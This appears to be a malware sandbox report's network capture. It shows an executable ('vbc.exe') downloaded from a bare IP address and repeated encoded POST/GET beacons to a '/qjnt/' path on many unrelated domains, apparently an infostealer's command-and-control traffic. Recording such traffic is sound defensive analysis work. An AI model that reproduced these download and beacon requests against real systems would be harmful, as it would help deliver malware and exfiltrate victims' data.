Network Analysis

GET /c/vbc.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E) Host: 23.95.122.25 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Wed, 28 Apr 2021 00:56:40 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Last-Modified: Mon, 26 Apr 2021 09:44:10 GMT ETag: "65000-5c0dcfcca2e80" Accept-Ranges: bytes Content-Length: 413696 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /qjnt/ HTTP/1.1 Host: www.thebluefishhotel.net Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.thebluefishhotel.net User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.thebluefishhotel.net/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 502 Bad Gateway Connection: close Date: Wed, 28 Apr 2021 00:57:03 GMT Content-Length: 0

GET /qjnt/?5j=QMUGPevhnI2Yp74JHEVzH6HtR6H2zoEQzpkVeMV2m2AjEhovI/wxUE2mGeKCbnOUy7J9Z//U&vTdDF=LJBx HTTP/1.1 Host: www.thebluefishhotel.net Connection: close

HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Wed, 28 Apr 2021 00:57:03 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: oyPAyqlY/qZaTAYRM Connection: close

POST /qjnt/ HTTP/1.1 Host: www.forrealmodels.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.forrealmodels.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.forrealmodels.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK Date: Wed, 28 Apr 2021 00:57:09 GMT Server: Apache/2.4.10 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1

GET /qjnt/?5j=/8UA4kKoPYWid4Wy4SiZil89tJjdT7ic7hTrtZ5fAe41kMJ49sOOTLg7IOgO80aghp25g4RJ&vTdDF=LJBx HTTP/1.1 Host: www.forrealmodels.com Connection: close

HTTP/1.1 200 OK Date: Wed, 28 Apr 2021 00:57:09 GMT Server: Apache/2.4.10 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=ISO-8859-1

POST /qjnt/ HTTP/1.1 Host: www.frotaconceitos.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.frotaconceitos.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.frotaconceitos.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /qjnt/?5j=SklQbBNIGDp60jmvc81YaO0+TakJjqFF7kfS9N7pp+kjm4De+jDioVGollGezL8QEhW81teu&vTdDF=LJBx HTTP/1.1 Host: www.frotaconceitos.com Connection: close

HTTP/1.1 403 Forbidden Date: Wed, 28 Apr 2021 00:57:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 160 X-Sorting-Hat-ShopId: 46142423201 X-Dc: gcp-us-central1 X-Request-ID: d200e7dc-910a-4d03-9b25-bd6884ce63f0 X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 09b79413880000eb25e2036000000001 Server: cloudflare CF-RAY: 646c55ff38b7eb25-LAX alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400

POST /qjnt/ HTTP/1.1 Host: www.startrekepisode.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.startrekepisode.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.startrekepisode.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Wed, 28 Apr 2021 00:57:26 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_LPf1eKzr2zpTqhHRdz8LiycYQZKF5hnNhUORTSxycnmYaz+J/1qSHPk/m7gPRIceenmSQmOe2lbReyuQiPqNHA Via: 1.1 google Connection: close

GET /qjnt/?5j=5+BnPckFTRrJGxaMVUv0BF1FKPa8eJDIfTmAxOSqxwEOI5f2tl64h5cJxkg2lQOsq3TBX7Br&vTdDF=LJBx HTTP/1.1 Host: www.startrekepisode.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 28 Apr 2021 00:57:26 GMT Content-Type: text/html Content-Length: 275 ETag: "6085c704-113" Via: 1.1 google Connection: close

POST /qjnt/ HTTP/1.1 Host: www.graniteinaminute.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.graniteinaminute.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.graniteinaminute.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 400 Bad Request Connection: close

GET /qjnt/?5j=Kc40ChrvGMsz5sDUgJdI1Tm80ndRwqOobrZe5CnH/KVtq0OHhWuXcnL+C6x+hGBLT8rXGqGg&vTdDF=LJBx HTTP/1.1 Host: www.graniteinaminute.com Connection: close

HTTP/1.1 400 Bad Request Connection: close

POST /qjnt/ HTTP/1.1 Host: www.xn--jpr220deud640b.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.xn--jpr220deud640b.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.xn--jpr220deud640b.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Apr 2021 00:57:36 GMT Connection: close Content-Length: 1245

GET /qjnt/?5j=jCTS+G1v0GO0ffaNHB4bN1x+uxcHkkGvZyQiwKE+/XJ/MeCy3/lhGRbiqne2xOkH/Blgq97x&vTdDF=LJBx HTTP/1.1 Host: www.xn--jpr220deud640b.com Connection: close

HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Apr 2021 00:57:36 GMT Connection: close Content-Length: 1163

POST /qjnt/ HTTP/1.1 Host: www.warriornotesgolbalprayer.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.warriornotesgolbalprayer.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.warriornotesgolbalprayer.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Wed, 28 Apr 2021 00:57:51 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_b0De5wDRG8JDiLYa0NlmEcfjDDdYQrWxY7kU4IUf6ziSMcykea68+TEeSz6Dfn5vPFUn04wuEuhgyGxUXVrezw Via: 1.1 google Connection: close

GET /qjnt/?5j=NZEjDeTbQWI4t+jLVj6ckcPfHkTvqBwW1gJjjcociDWZiHYNHkrr42q5Qu5MGWq/DbzHTKzP&vTdDF=LJBx HTTP/1.1 Host: www.warriornotesgolbalprayer.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 28 Apr 2021 00:57:51 GMT Content-Type: text/html Content-Length: 275 ETag: "6085c4a5-113" Via: 1.1 google Connection: close

POST /qjnt/ HTTP/1.1 Host: www.akerii.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.akerii.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.akerii.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 28 Apr 2021 00:58:02 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.akerii.com/qjnt/

GET /qjnt/?5j=kSZZl6jWs3Sc3KX4sFYto2o1JEu4hGi+VMhwGPIJktQ5K/I5FgrvGI5WQKi2EBcGxzW2rAmT&vTdDF=LJBx HTTP/1.1 Host: www.akerii.com Connection: close

HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 28 Apr 2021 00:58:02 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.akerii.com/qjnt/?5j=kSZZl6jWs3Sc3KX4sFYto2o1JEu4hGi+VMhwGPIJktQ5K/I5FgrvGI5WQKi2EBcGxzW2rAmT&vTdDF=LJBx

POST /qjnt/ HTTP/1.1 Host: www.rivcodevelopment.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.rivcodevelopment.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.rivcodevelopment.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 400 Bad Request Connection: close

GET /qjnt/?5j=8NBAzZEp5T2EoF9wMDQ69YhjG3fhuSs/Y3qkwEtmFVQU29n+5biQRN67qVAa42W8gpsiaP+Q&vTdDF=LJBx HTTP/1.1 Host: www.rivcodevelopment.com Connection: close

HTTP/1.1 400 Bad Request Connection: close

POST /qjnt/ HTTP/1.1 Host: www.gailrichardson.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.gailrichardson.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.gailrichardson.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Wed, 28 Apr 2021 00:57:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close

GET /qjnt/?5j=cQpYuVHVGObCoOy3oJObHgw0bCNAclVj5U/7sRdD/qRSo/tXEB2YKGAusTd/rcUBeGIQZ61D&vTdDF=LJBx HTTP/1.1 Host: www.gailrichardson.com Connection: close

HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Wed, 28 Apr 2021 00:57:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close

POST /qjnt/ HTTP/1.1 Host: www.relaxxation.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.relaxxation.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.relaxxation.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Wed, 28 Apr 2021 00:57:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close

GET /qjnt/?5j=mxaFhsYpdbWAcRjreClqDIL9OHFKPqnw/WaD4R8v0Y7MiHTOLhCg3x68N9MAlpNWynvCyQkZ&vTdDF=LJBx HTTP/1.1 Host: www.relaxxation.com Connection: close

HTTP/1.1 410 Gone Server: openresty/1.13.6.2 Date: Wed, 28 Apr 2021 00:57:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close

POST /qjnt/ HTTP/1.1 Host: www.buckhead-meat.com Connection: close Content-Length: 212 Cache-Control: no-cache Origin: http://www.buckhead-meat.com User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.buckhead-meat.com/qjnt/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 405 Not Allowed Server: openresty Date: Wed, 28 Apr 2021 00:58:31 GMT Content-Type: text/html Content-Length: 556 X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_C9dgU1D2MBaHPH3IdAEhS/XqvIH2XUfuIfQ92U12vE0AP7od6HbMXQRm3dhAEGPljv3pRKLW3hAGKtx0XrqiyQ Via: 1.1 google Connection: close

GET /qjnt/?5j=/eERDYDYg8Pjpk/w148+Jv3JxRRGqAllXY9DrwYjMBHW71fIc6WywKuPNHthuS6BfUUI+/zo&vTdDF=LJBx HTTP/1.1 Host: www.buckhead-meat.com Connection: close

HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 28 Apr 2021 00:58:31 GMT Content-Type: text/html Content-Length: 275 ETag: "6085c4a5-113" Via: 1.1 google Connection: close